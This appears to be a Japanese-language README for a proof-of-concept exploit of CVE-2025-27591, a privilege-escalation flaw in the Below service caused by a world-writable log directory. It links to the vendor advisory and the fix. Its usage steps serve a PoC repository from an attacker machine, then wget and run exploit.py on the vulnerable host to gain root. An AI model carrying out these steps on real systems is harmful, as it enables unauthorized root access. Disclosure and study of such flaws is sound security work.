
CVE-2025-27591 は、バージョン0.9.0より前のBelowサービスに影響を与えた特権昇格の脆弱性です。問題は、/var/log/below にワールド書き込み可能なディレクトリが作成されたことに起因します。攻撃者はこのディレクトリ内でシンボリックリンクを操作し、root権限を取得する可能性があり、ローカルの非特権ユーザーにとって深刻なセキュリティ上の懸念事項となっています。
この概念実証は、教育および研究目的のみで作成されました。
執筆時点では、この脆弱性に対する公開されたPoCはコミュニティに存在していませんでした。そのため、私はこの実装を責任を持って共有し、そのギャップを埋め、セキュリティ研究エコシステムに貢献し、安全でないファイルシステムの重大性について認識を高めることにしました。
攻撃者マシンから:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
脆弱なシステムから:
1- wget http:///exploit.py
2-python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3